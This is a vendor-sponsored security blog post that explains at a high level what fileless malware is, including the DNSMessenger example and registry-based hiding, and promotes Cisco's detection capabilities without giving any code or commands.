In Pursuit of Invisibility: Fileless Malware

October 2, 2018 | Views: 3470

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

This blog is sponsored by Cisco and was originally posted on their blog by:
Marc Blackmer
September 13, 2018

I recently heard a news story about a survey in which people were asked whether they would prefer to the ability to fly or to be invisible. Sure, it was a silly question*, but it was interesting to hear why people made their choices. The majority chose flight. What really fascinated me was that the survey’s authors believed that most people would have actually preferred to be invisible. But, they chose flying because they associated invisibility with unethical and criminal behavior.

That association, of course, got me thinking about security. Being invisible is what cybercriminals strive to be, and the development of fileless malware helps them getting pretty close.

Fileless malware is a type of memory-resident malware. As the term suggests, it is malware that operates from a victim system’s memory, not from files on the disk. This makes it more difficult to detect because there are no files to scan. And it makes forensics more difficult because the malware will just disappear when the victim computer is rebooted.

Fileless malware can find its way into a network through phishing, malicious websites, etc., just as any other kind of malware would. The difference is that there is no executable file installed or run at the time of infection. That’s the fileless part. The malware then runs in system memory and manipulates administrative utilities like Windows PowerShell and Windows Management Instrumentation (WMI) to do its work. Because of many security technologies explicitly trust these utilities, the malware stays under the radar and its activities appear benign.

Our Cisco Talos threat intelligence team blogged about a creative example of fileless malware they called DNSMessenger in late 2017. (You can read their full blog post on DNSMessenger here) The attackers sent a compromised Word document to their victims through email and enticed users to enable macros in the document. Once enabled, a macro launched a Windows PowerShell script to reach out to specific Internet domains via WMI. The malware received further instructions from the DNS TXT files associated with those domains.

Traditional file-centric malware detection technologies would not have detected this threat because there were no files installed. Because the malicious instructions were cleverly placed in DNS records external to the victims’ networks. While everything would have appeared normal from a file-based perspective, it would have taken close monitoring of DNS traffic to detect the threat.

Another technique used by fileless malware authors is to put encoded commands in one or more specific Windows Registry keys. The Registry is not an area where security products tend to look for malware. It’s trusted. So, if a PowerShell script reads a registry key, that activity doesn’t appear to be out of the ordinary. What is out of the ordinary is that Registry keys aren’t normally encoded. Again, file-based malware detection would miss such a threat, but endpoint protection that looks for obfuscated Registry keys would be needed.

These are just a couple of examples of how far attackers have come in exploiting trusted processes and in taking advantage in the gaps between isolated security technologies.

Attackers won’t just try one attack vector and give up if that doesn’t work. They’ll jiggle every door knob, check every window, and see what can fit under the door in order to gain a foothold in your network. And those gaps in protection help them do just that. So logically, one security technology will not defend against all variations of these attacks. Phishing attacks need to be blocked. Malicious attachments need to be stripped from emails. Traffic to bad domains needs to be stopped. Network traffic needs to be monitored for anomalies inside and outside of the data center to the endpoints. And when a threat is detected through one attack vector, that intelligence needs to be shared across all defensive technologies, preferably through automated means.

The good thing is, we do all of these things and more. First, we have developed indicators of compromise for fileless malware such as detecting unusual content in DNS requests or unusual Windows Registry key content that could be used to obfuscate malicious commands.

Next, consider that we gather telemetry from hundreds of billions of emails, over 100 billion DNS requests, and analyze close to 2 million malware samples every day. We conduct research using thousands of honeypots, through reverse engineering malware, and conducting vulnerability research. Because our research encompasses network, endpoint, web, cloud, email, and files, we see more and can detect more. All of the output from our research ends up in the content of our entire security product portfolio that protects you.

If you’d like to learn more about fileless malware, be sure to read the Talos blog post linked above and their follow up post available here. Both posts include a list at the end of the ways we help mitigate the threat of fileless malware. And as always, we’d love to share our technology with you through an instant online demo or a personalized demo with one of our security experts.

* Me? I’d choose flight. No, really.

Share with Friends
Use Cybytes and
Tip the Author!
Share with Friends
Ready to share your knowledge and expertise?
1 Comment
  1. wow. that’s a fascinating article. I too would choose flight..

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play

Support Cybrary

Donate Here to Get This Month's Donor Badge

Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?